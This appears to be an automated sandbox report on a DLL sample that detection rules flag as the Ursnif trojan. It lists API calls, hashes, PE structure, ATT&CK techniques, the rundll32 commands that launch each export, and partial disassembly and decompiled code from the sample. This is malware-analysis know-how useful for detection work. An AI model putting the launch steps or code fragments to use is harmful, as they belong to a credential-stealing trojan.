Source: loaddll32.exe, 00000000.00000002.900668496.0000000000BA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.901484262.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.901496797.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.901571033.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.901722448.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.901100477.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.901151375.0000000003600000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.900668496.0000000000BA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.901484262.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.901496797.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.901571033.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.901722448.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.901100477.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.901151375.0000000003600000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.900668496.0000000000BA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.901484262.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.901496797.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.901571033.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.901722448.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.901100477.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.901151375.0000000003600000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.900668496.0000000000BA0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.901484262.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.901496797.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.901571033.00000000033A0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.901722448.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.901100477.0000000003010000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.901151375.0000000003600000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4906EF cpuid

0_2_6D4906EF

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4C4A8A
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoEx,	0_2_6D4901B9
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4C40B9
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D47F379
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6D4CD50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6D4CDC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4CD7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4CD783
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6D4CDE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	2_2_6D4901B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4CD887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6D4C40B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D47F379
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6D4C4A8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_6D4CD50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6D4CDC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D4CD7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D4CD783
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_6D4CDE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	3_2_6D4901B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D4CD887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6D4C40B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D47F379
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6D4C4A8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_6D4CD50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6D4CDC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6D4CD7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6D4CD783
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_6D4CDE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	4_2_6D4901B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6D4CD887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6D4C40B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6D47F379
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6D4C4A8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_6D4CD50B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_6D4CDC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6D4CD7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6D4CD783
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_6D4CDE61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	5_2_6D4901B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6D4CD887
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6D4C40B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_6D47F379
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_6D4C4A8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6D4C4A8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	6_2_6D4901B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6D4C40B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6D47F379

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D47B218 GetSystemTimeAsFileTime,

0_2_6D47B218

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4C8870 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_6D4C8870

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_6D451850 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

2_2_6D451850

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.3.rundll32.exe.c5a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.f1a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.eca4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d450000.2.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.3.rundll32.exe.c5a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6d450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.f1a4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.eca4b1.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6d450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6d450000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery23	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
606e7fb752fbd.rar.dll	6%	ReversingLabs	Win32.Trojan.Ursnif

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.d10000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383661
Start date:	08.04.2021
Start time:	06:02:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	606e7fb752fbd.rar.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal56.troj.winDLL@15/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 9% (good quality ratio 8.5%) Quality average: 71.3% Quality standard deviation: 26.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe Report creation exceeded maximum time and may have missing disassembly code information.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.562725713508687
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.40% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Disk Image (Macintosh), GPT (2000/0) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	606e7fb752fbd.rar.dll
File size:	1007104
MD5:	8bf44d2b3b9b7c0fa2754fbe6ad14a63
SHA1:	76d4ed4512d34edd5a34b917957654fedbfae23f
SHA256:	cb7c95db9ce05d2304a4a98687a4b92f85081e1b7397820a52487b277ee1f2e1
SHA512:	58d7912fb2486ee944cda295f80293bed6f207631fd79611a64e350f60bc6ff662fc9f66a1e57fefbe9998d081b6f92807ed7ca85dafaa7a313ff7047decede8
SSDEEP:	24576:lLtF9jICeGoQ8T1Mk7Hv/3+MM9hbAK0uf:/FpPeGovT1t33+p9hbAK0uf
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."6..fW..fW..fW....l.kW....n..W....o.{W..4?..pW..4?..PW..4?..yW..o/..oW..fW...W...>..gW...>..gW...>b.gW...>..gW..RichfW.........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1040e44
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5AC0F310 [Sun Apr 1 14:56:16 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	935187af3562f5148cd8683f99f748de

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FB32D027867h
call 00007FB32D02824Bh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FB32D02770Fh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FB32D026DC2h
jmp 00007FB32D027840h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FB32D026DB1h
jmp 00007FB32D02782Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E4074h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E4074h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe2c40	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe2cdc	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10b000	0x528	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10c000	0x703c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd8cf0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xd8de8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xd8d48	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb0000	0x1e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xaef21	0xaf000	False	0.524893973214	data	6.69988661327	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb0000	0x33798	0x33800	False	0.528073801578	data	5.1051416342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe4000	0x26b60	0xba00	False	0.562668010753	data	4.83370710676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x10b000	0x528	0x600	False	0.412109375	data	3.76195156474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10c000	0x703c	0x7200	False	0.694421600877	data	6.654304142	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x10b0a0	0x304	data	English	United States
RT_MANIFEST	0x10b3a8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	GetShortPathNameA, WaitForMultipleObjects, GetEnvironmentVariableA, Sleep, GetTempPathA, CopyFileA, GetFileAttributesA, GetSystemDirectoryA, GetWindowsDirectoryA, VirtualProtectEx, CreateProcessA, CreateSemaphoreA, OutputDebugStringW, OutputDebugStringA, SetEndOfFile, HeapSize, WriteConsoleW, SetStdHandle, CreateFileW, GetProcessHeap, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, GetCPInfo, CompareStringW, LCMapStringW, GetLocaleInfoW, CloseHandle, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, GetModuleFileNameW, GetCurrentThread, GetACP, HeapAlloc, GetStdHandle, GetFileType, HeapFree, HeapReAlloc, ReadFile, SetFilePointerEx, WriteFile, GetConsoleCP, GetConsoleMode, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, ReadConsoleW, SetConsoleCtrlHandler, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, CreateThread
ole32.dll	CoTaskMemAlloc, CoInitialize, CoUninitialize, CoTaskMemFree
WS2_32.dll	getprotobynumber, WSAStartup, getservbyport, WSACleanup, setsockopt, socket
RASAPI32.dll	RasEnumConnectionsA, RasGetConnectStatusA

Exports

Name	Ordinal	Address
Choosethan	1	0x1086ad0
Especiallyyes	2	0x10865e0
Guesscover	3	0x1086ff0
Learncut	4	0x1088240
OnceOut	5	0x1087600

Version Infos

Description	Data
LegalCopyright	Copyright 1998-2014 Had Home, Inc
InternalName	Serve color
FileVersion	6.7.0.400
CompanyName	Had Home
ProductName	Had Home
Think beat	FreeHere
FileDescription	Serve color
OriginalFilename	Brought.dll
ProductVersion	6.7.0.400
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6444 Parent PID: 6060

General

Start time:	06:02:53
Start date:	08/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll'
Imagebase:	0x360000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6456 Parent PID: 6444

General

Start time:	06:02:53
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6464 Parent PID: 6444

General

Start time:	06:02:54
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Choosethan
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.873095643.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6476 Parent PID: 6456

General

Start time:	06:02:54
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\606e7fb752fbd.rar.dll',#1
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.874026586.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6516 Parent PID: 6444

General

Start time:	06:02:57
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Especiallyyes
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.890597997.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6532 Parent PID: 6444

General

Start time:	06:03:01
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Guesscover
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6552 Parent PID: 6444

General

Start time:	06:03:05
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,Learncut
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6596 Parent PID: 6444

General

Start time:	06:03:11
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\606e7fb752fbd.rar.dll,OnceOut
Imagebase:	0xff0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6444 Parent PID: 6060 loaddll32.exeCOMMON

Executed Functions

Function 6D45D4D0, Relevance: 10.7, APIs: 7, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6D45D4D0(void* __edx, void* __fp0) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v32;
				char _v36;
				void* _v40;
				char _v44;
				char _v60;
				char _v108;
				char _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				intOrPtr _t61;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t76;
				void* _t78;
				signed int _t83;
				signed int _t84;
				void* _t85;
				intOrPtr _t88;
				intOrPtr _t92;
				void* _t98;
				signed int _t100;
				intOrPtr* _t104;
				void* _t110;
				void* _t122;
				void* _t130;

				_t130 = __fp0;
				_t98 = __edx;
				_t85 = _t110;
				_v8 =  *((intOrPtr*)(_t85 + 4));
				_push(0xffffffff);
				_push(0x6d4fc1bb);
				_push( *[fs:0x0]);
				_push(_t85);
				_t54 =  *0x6d534074; // 0x97f0af70
				_push(_t54 ^ (_t110 - 0x00000008 & 0xfffffff8) + 0x00000004);
				 *[fs:0x0] =  &_v24;
				_v32 = 0;
				E6D476A10( &_v44, 0);
				_v16 = 0;
				_t100 =  *0x6d53fb54; // 0x2
				_v40 =  *0x6d55a9e8;
				if(_t100 == 0) {
					E6D476A10( &_v36, _t100);
					_v16 = 1;
					_t122 =  *0x6d53fb54 - _t100; // 0x2
					if(_t122 == 0) {
						_t83 =  *0x6d53fb40; // 0x2
